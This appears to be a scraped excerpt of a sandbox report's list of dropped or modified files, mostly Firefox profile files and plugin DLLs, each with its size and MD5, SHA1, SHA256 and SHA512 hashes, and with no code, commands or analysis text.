SHA256d012a3e932b930bb192593acaf59228f3b0694ed156c13ee288649769013a744
SHA512f22a574b65d167e207de93851f567b5f3f2fd7d5d0873ba2d5244666cb331ffbdfc2104370a50a74407ec6decae2a156a7427918f1663ed738d920667a3cf00d
-
Filesize
717B
MD5b15af93a4a6ad4b3b7a48ba9eebbb7de
SHA1edd40f5a7a5da8c571f412ecdee78836b1b5ff8f
SHA2566413f77422aeac4fbfcad0742768ebaa2e0a83e50fb3376886cd0c4242a803f3
SHA5128d80c5210510be28333fe93b283355e8aad5743d5372a95410449f9b6ee01bd48e90685e5a13dc962dbc8ec77c6f354cbf4d5162d2941284996d91e9b3f1e75d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
18KB
MD5f3edff85de5fd002692d54a04bcb1c09
SHA14c844c5b0ee7cb230c9c28290d079143e00cb216
SHA256caf29650446db3842e1c1e8e5e1bafadaf90fc82c5c37b9e2c75a089b7476131
SHA512531d920e2567f58e8169afc786637c1a0f7b9b5c27b27b5f0eddbfc3e00cecd7bea597e34061d836647c5f8c7757f2fe02952a9793344e21b39ddd4bf7985f9d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\AlternateServices.bin
Filesize10KB
MD5d1223423e732f7df505046afa91995e6
SHA1c8a31b4f4809aca2f376f7d7cff2f5a3bcd50dbe
SHA256ba0eb138a87eb47877924d0d10a9cd3f5065fc65008b713f4054bcff0b609105
SHA512d7781f34fe753631ac427e03029e3f419227e3b19beef1f10559bd1376f55529773b681702ef84ac06f670c1c33e80e002fa947c8730ed83ffa22493c96e19b9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\AlternateServices.bin
Filesize13KB
MD57de78d0e348d33ee0ec3e1e7a6a890b1
SHA1fe1cbdc9ed05b3a6dcc9af93fd37b57eea00087e
SHA2569c70e4908bb6a16c6e2b139fbefc17f7f25d5ce7cb8665558ee7af069e3bc58b
SHA512ce6a31d8bd956666053ed380766e653b7db90c73a4a65d59c0e91dab89ab22cf9d1476de7ff39bcb9cd9b5ecc7057f6b47e7448038d64e85b87c0c1d2e22ffbd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD5511b5927a7b262ae4bdae04038638485
SHA1fe2806a53b0c4faf6fc77e969ac9ca0ffc46521f
SHA2567d4a9514ec8574ccc5936929e12771380f5abe243ec002780674253a45172053
SHA512105b3290fd33d713fd9f9afbffa89fa00d96856084aee3c0781f136da0085bcd50ac1300ffe26e6b6281b93f88194d4c732c26cf0157efd1a3967a16abf68b75
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5d833b4e90b6f38e178342e341b3e9d50
SHA14bb38149ade39c8c41526c0adfd3f1dcd03a34f4
SHA2567fac53846f44b0af536134e71d6bfe0881c5a80f4d72dfc8c4189cc06340681b
SHA512e99210115c8a1d8acceb3cc4e85affc984a6343f21e0bc3890f51fcb2ed3083543c6bd953dd8d6033bec0cf07a27667d224393628b35ef75f7a70a4c5cd16dd6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\datareporting\glean\pending_pings\43e68d32-6bef-4560-991d-57037736d4b6
Filesize982B
MD5a3eaea456b758e2c4ad4e77908c67daf
SHA1671794933af6409e5712ea0719bbbac7727e13b2
SHA2565a580e562fa875aca8af0ca00ae702e6e3e8509fa4881c123aba4e433f08fd8e
SHA51253b798306faae6e800844e01565a93e99c2c5d99022bc406115b7339cff65bfffc50c8cd751c123ef93ce30dc763e0b42f48d08150320664f92e86ae392583df
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\datareporting\glean\pending_pings\7a0f9d79-74d6-4812-af71-b9cf576a631c
Filesize671B
MD5764087ecf81885fb5182baf3bcb4b820
SHA15d05dc5eedd32cef25c7dd9d96df67b8cb900ad9
SHA25608ee44e886676dc417e9dc6cd80ee87ca8bf19f2df9a9fbd5cd52d1be0ce7dd0
SHA512b95ffa736239901697660fc2e2bc3d863dab30364b68504dc7418a22f97a11b4b732b33286f43ce87484053a8c3ba7da43ad69b524b21d3cca812e1355340cc0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\datareporting\glean\pending_pings\95953181-3af5-46d6-aa4f-f23bed4ad418
Filesize28KB
MD5ccb5073937bc5d344c8afeb587a3a875
SHA1a79a9b315e235d2b8874d069a764cf5743f84b5e
SHA2563d5d62ca5a0125dcf6885365a3ed0b87d017627dc6a2590323e2c394b49ce6e9
SHA5122c7de2353a7c8974f0ffe8f8f7e8e617f2a0c42bad08054b0e10c7269dfc857d886dfa68f1204e79d70304ce786d1a01bab6726735e776eb205d0a54cdc8cec9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\favicons.sqlite-wal
Filesize160KB
MD506865a6d1fc69e3822b151e3873599de
SHA19727dda8772b02a7697faf372ba10ded9f056fb5
SHA2560520d3d5353401db4f86ecf21a54c9b7764e5c926109b3c093479352f90e150c
SHA512ea7385c92a233a6428a9abaaeea0674ed88e0811dac2ffebd1bb3dff2e42d189aadd4ce3fce72862b86734d5a93ee26b073798c408838f93949153a93fd070b6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\v82jw7ls.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
1.4MB
MD51c65f2f0ab4522c7b3eead30de31e470
SHA1de88a4e0e671494a6fd4c9053f3fec0e6337c326
SHA2564a773ba755af77e5993859857963719f716bf21d96cb2c7b8b374b5431bb0a4a
SHA51207ed2c14fb746c75a7d9d9b2ea7de110162e0237fa17e495ebc267c6d814def18bc84780e4a86a6af623eacd1519331c7f36f5d6f65b69310e7f33c93084722a
-
Filesize
9KB
MD5a71d0c6ce8d9de213b9109bd98225231
SHA1fadb314790450da824cff688a55ce3b64bf31ee0
SHA2562318b53f9cdda803f9674bb1efde2f1aebb0006a3caef5fea317144a79d34b94
SHA5126d5d4329777dd91c03cbe0a5956c10371b45d18590fde178fd4f4365e01ab5c8f81e4c02376c6d50b4933e5518ff659c925bc3e2f0c8521f3c5f48a7dc0d8b69
-
Filesize
15KB
MD574bc79844b5f7ac9d6df3f4a240b6b23
SHA1a651262fcc61abaeefdf24d3e6e717dc64495ee8
SHA256536d5995a5486afc7dc4e1a639934c908c03ac86971fe318020971262ac2aa25
SHA5124dafc18c3fd5f60d00e25b5a3cf3ff8195115b523785e58464dcfbf301869a01321224f11489c6922d1f8aec1a421b211b7667df2929ce4f24215e176e0bbb73
-
Filesize
10KB
MD563d3351df5466525d02a078f5d81b52c
SHA162c4eb18592c96f4a680528a45a2b2d663acd082
SHA2560ba431806a821e085d305c8ccd625838cef7b4af07a83dd1a1a219c45d79a56f
SHA5124e378d5bf4683305ddd4a66961bd860d9d56f3ec29c7d477a3d2017ffa1be00deeeaa0a4e2751bd996b148c9158d5fee32b3dc25dcb899f6063738ed58a1a5a3
-
Filesize
9KB
MD5c69fa7077643dd62df90f052f38e29bd
SHA1b76acd501ad4f830aba87b523ca334d147e4cf76
SHA256f185c7c29fcd1b80840cd8b8aa126cad85d36a608dd583fb2a27971d9f125b6d
SHA512298fb6bd2915cf0f8810d6fa2d01266fcb521e8692088eecf2038d1dcfb4507ae36b4e3dd8eda6f4da3def266b3d7ceea3146fb7e9eda777ca0d402c6e9121bb
-
Filesize
138KB
MD5137e3a65922a769e161f6241fc4800a5
SHA14260d6197fff6a2816363f66d4782a3e14c2c8f4
SHA2564a7e9eb31388ea24cf203e005dfaf80be2fb2c8160d5fb0c3038ad553d27756c
SHA5125d91fe6507e01cdbd0e5edf244c086cb9dee5e46296bf7128e63a1f8f0e6d87c9aa02d770cbe1e2d247078b44275d7f055c94f43d37a61a43d045efdaf4e6569
-
Filesize
2KB
MD51411af0e94a88ba0a191c1ed610de529
SHA1254deac19d6a6ce7ab547b4aa1d9d3ca85a4374c
SHA2560a34eb4bc965673877ab5116d6d81f77b49889640a136aeeb54da5982d9d63be
SHA512676f39ce719694d58c925df05c10a61f0f4bf69a5bd6410f6efbd985afaa569c5fb1e1b20b2f355e702f6a277630beb40e0fcbb2c3f894a240fa14d966e02888